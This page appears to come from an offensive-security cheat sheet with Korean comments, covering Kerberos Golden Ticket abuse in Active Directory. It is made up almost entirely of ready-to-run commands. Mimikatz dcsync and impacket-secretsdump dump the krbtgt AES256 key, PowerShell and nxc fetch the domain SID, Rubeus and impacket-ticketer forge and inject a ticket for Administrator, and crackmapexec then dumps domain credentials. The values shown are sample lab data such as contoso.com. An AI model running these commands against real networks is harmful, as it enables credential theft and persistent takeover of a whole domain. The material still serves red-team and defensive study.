Golden Tickets
Abuse
# krbtgt의 커버로스 키(AES256) 덤프
mimikatz # lsadump::dcsync /user:contoso\krbtgt /domain:contoso.com
# 도메인 SID 덤프
Import-Module ActiveDirectory
(Get-ADDomain).DomainSID.Value
# 티켓 생성 및 환경변수 등록
.\Rubeus.exe golden /aes256:d376cee2f5651cf7c767924f1b4ff8732dfaf974fbde27e0f9af461d5ee951eb /user:Administrator /domain:contoso.com /sid:S-1-5-21-2835490888-2107562977-246861531 /nowrap /ptt# krbtgt의 커버로스 키(AES256) 덤프
impacket-secretsdump contoso.com/Administrator:'Password123!'@192.168.1.11 -just-dc-user contoso/krbtgt
# 도메인 SID 덤프
nxc ldap 192.168.1.11 -u Mick3y -p 'Password123!' --get-sid
# 티켓 생성 및 환경변수 등록
impacket-ticketer Administrator -domain contoso.com -domain-sid S-1-5-21-2835490888-2107562977-246861531 -aesKey d376cee2f5651cf7c767924f1b4ff8732dfaf974fbde27e0f9af461d5ee951eb
export KRB5CCNAME=Administrator.ccache
# dcsync
crackmapexec smb 192.168.1.11 -u Administrator --use-kcache --ntdsOpsec





References
Last updated